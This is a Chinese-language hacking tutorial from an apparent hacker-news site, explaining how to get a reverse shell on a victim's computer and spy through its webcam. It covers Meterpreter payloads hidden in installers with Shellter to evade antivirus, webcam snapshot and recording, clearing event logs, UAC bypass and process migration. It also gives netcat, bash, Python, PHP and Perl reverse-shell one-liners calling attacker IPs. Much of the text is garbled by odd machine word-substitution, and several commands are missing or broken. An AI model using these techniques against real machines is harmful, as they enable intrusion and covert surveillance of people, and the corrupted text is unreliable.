反向壳和控制网络摄像头

反向壳和控制网络摄像头

黑客教程hacker2019-07-12 22:56:0111152A+A-

如果您的网络摄像头上带一大块胶布,您很可能我听说网络黑客或NSA可以远程控制炮兵您。问题是如何?远方的人,你难见的人如何能够远程连接你的设备并控制你?

目前可能你的中央电视台,iP高清摄像头只是泄露在互联网技术上,攻击者在Shodan等网站上发现了它。你没有变更默认设置登陆密码和bam,他们在。看你的言谈举止。

物联网技术摄影机通常就是这种情况。但是,如果我们谈及您内嵌的网络摄像头,回答更可能是通过Meterpreter有效负荷。Meterpreter可以让你网络访问反向shell,这是我们将在下面介绍的内容。有关Meterpreter的其他信息,请阅读文章:

你可能在想,为什么反向壳?他们为什么不直接网络访问我的设备?还好,因为这种方法很可能会被阻拦。我们趋向于限制入站留量比出站留量更多。如果有人想要接入到您的设备,您的设备很可能会阻拦它(就算被伸出)。而且,如果您试着接入它们,则您的计算机系统更有可能让此留量通过。这意味着您的设备是想要建立接入的设备。

反向壳和控制网络摄像头

是一个框架结构,我们将用它来得到反向shell。它已经预装在Parrot和Kali上。让我们运作以下指令来建立Meterpreter反向TCP shell有效负荷。

反向壳和控制网络摄像头

任务完成。目前让我们提交那个和.......... blocked。这意味着MeterPreter是毫无疑问的有效载荷,因此大部分的杀毒软件都能够阻拦/隔離它。如果你正在处理一个目前仍旧存在的不安全的用户。

反向壳和控制网络摄像头

我们可以使用一个名叫Shellter的工具来试着变更哈希并将反向shell内嵌到其它文档中。通常,一个人选择将shell内嵌到安装文件中。原因是,大部分安装文件需要以管理人身分运作。犹如您稍候将见到的这样,以管理人身分运作漏洞利用程序可以完成所有艰难工作。

你可以通过简单地运作它的避难所来开始庇佑。一样,这是预装Parrot和Kali。

反向壳和控制网络摄像头

我们目前使用Auto [A]并定位我在此范例建立的可执行文件。

反向壳和控制网络摄像头

下一步,我们选择反向TCP shell并键入我们设备的iP和端口号(攻击者)。完成后,它会将shell内嵌到您选择的exe中,为了您可以将其上传入目标计算机系统。目前你必须使用一种复杂的方法将它放进目标设备上,但是对于这个事例,我将拷贝并黏贴。

尽管,虽然屏蔽了Meterpreter壳子,av仍尽可能检验到它。如果你就准备把它关闭,因为我能。在现实世界中,攻击者会将av偏瘫或使其盲从,为了他们可以降低有效载荷。

目前利用是在目标设备上,让我们运作它。

在我们开始之前,让我们在进攻计算机系统上载入msfconsole(Metasploit)并运作以下指令:

使用

反向壳和控制网络摄像头

您的会话目前将侦听反向shell脚本中特定的端口号和iP。目前让我们让用户运作漏洞利用:

反向壳和控制网络摄像头

犹如您在右边所见到的,我们几个失败。我眼中的自己之前谈及的需要用户以管理人身分运作它的内容。这样就可以运作和引入所有脚本和DLL。如果用户以管理人身分运作它,您将见到没有失败。像这样:

反向壳和控制网络摄像头

这是你可以开始玩的时候。攻击者可以在您的计算机系统上实行多选操作,但如果他们想要使用网络摄像头,他们会实行以下操作:

显视网络摄像头:

网络摄像头快照帮助:

拍照后不要载入图像:

录屏声频:

录屏网络摄像头:运作网络摄像头

终止录屏:运作网络摄像头

说“茄子!!!

反向壳和控制网络摄像头

源自智能机器人先生

这不仅是网络摄像头。您可以运作更多指令。比如:祛除所有日记(手机应用程序,系统和安全日志):

这是一个事例,因为网络黑客不大可能运作它。这意味着做这种事情会提示别人。当你发现几台设备已经完成了日记的抹除,你可以打赌有人已经上过它了。反之,攻击者很可能会全部删除选择的恶性事件以遮盖他们的足迹。目前,它将敏锐地发现像时间差别这样的物品。

所有这些都需要管理员权限,而您的用户可能没法使用升级的管理权限运作它。那很好,因为你可以使用像bypassuac_comhijacker这样的物品。你仍旧需要得到一个反向shell,首先它可以在用户级別。

得到shell后,键入网站后台并按Enter键。这会将当今会话挪到网站后台。随后你可以像这样交換到exploitpassacac_comhijack:

反向壳和控制网络摄像头

随后,您可以返回初始会话并运作以下指令:

反向壳和控制网络摄像头

如果完成,它应该给你一个管理人shell。完成此操作后,您将需要转移到更平稳的流程。并不是说你能想象空间你已经将你的反向shell掩藏在Putty exe或安装程序文档中。如果他们关掉手机应用程序,您的接入就会遗失,而您可能没法得到其它接入。这就是您希望迅速转移到不断运作的物品的原因。

反向壳和控制网络摄像头

首先,让我们查看正在运作的程序。要做到这一点,运作

反向壳和控制网络摄像头

找到平稳的程序后,运作

反向壳和控制网络摄像头

随后,这会将您的Meterpreter会话转移到其它程序。如果他们关掉被利用的手机应用程序,您的会话将保存。

犹如您所闻,Meterpreter非常强大!问题就是我迫不得已半自动停止使用安全控件。如果手机客户端是半安全的,它们很可能会阻拦您的有效负荷。这就是为啥利用系统漏洞时总是提供反向shell有效负荷的原因。利用可以容许他们上载和运作有效载荷,为了他们可以建立Meterpreter会话。

并不是得到反向shell的唯一方法。可以使用一个名叫Netcat的好看工具。犹如您在下面所见到的,您可能会有更多的运势,因为一些av经销商并不认为这是一种威协。

反向壳和控制网络摄像头

可以在usr / share / windows-binaries / nc.exe下的Parrot或Kali上找到Netcat 。将nc.exe上传入目标计算机系统后,我们可以运作nc.exe [Attacker iP] [Port] -e cmd.exe。这是您最有可能通过脚本自动实行的操作。

反向壳和控制网络摄像头

在攻击者设备上我们需要监视接入这可以通过运作来完成: nc -lvp [选择端口号

这将为您带来一个比较简单的反向shell。它只具有用户级管理权限,但那是一个起点网。随后,您可以使用它来进一步利用系统得到管理员权限。您并不总是必须拥有管理员权限才能完成大量工作。如果攻击者尽可能得到shell,他们可能只是开始偷取或删除文件。简单但有效。下面是一些运作反向shell的事例:

(“192.168.0.10”,1234); exec(“/ bin / sh -i <&3>&3 2>&3”)

&/ dev / tcp / 192.168.0.1 / 8080 0>&

,subprocess,Os; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((“192.168.0.10”,1234)); Os.dup2(s.fileno( ),0); Os.dup2(s.fileno(),1); Os.dup2(s.fileno(),2); P = subprocess.call([“/ bin / sh的”,” -我”]);”

使用Socket; $ i =“192.168.0.10”; $ p = 1234; socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”)); if(connect,S(sockaddr_ln($ p,inet_aton) ($ I)))){对外开放(STDIN,”>&S”);对外开放(STDOUT,


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 澄萌十鸦2022-05-29 15:30:17
  • le(Metasploit)并运作以下指令:使用反向壳和控制网络摄像头您的会话目前将侦听反向shell脚本中特定的端口号和iP。目前让我们让用户运作漏洞利用:反向壳和控制网络摄像头犹如您在右边所见到的,我们几个失败。我眼中的自己之前谈及的需要用户以管
  • 泪灼槿畔2022-05-29 17:40:28
  • 运作nc.exe [Attacker iP] [Port] -e cmd.exe。这是您最有可能通过脚本自动实行的操作。反向壳和控制网络摄像头在攻击者设备上我们需要监视

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理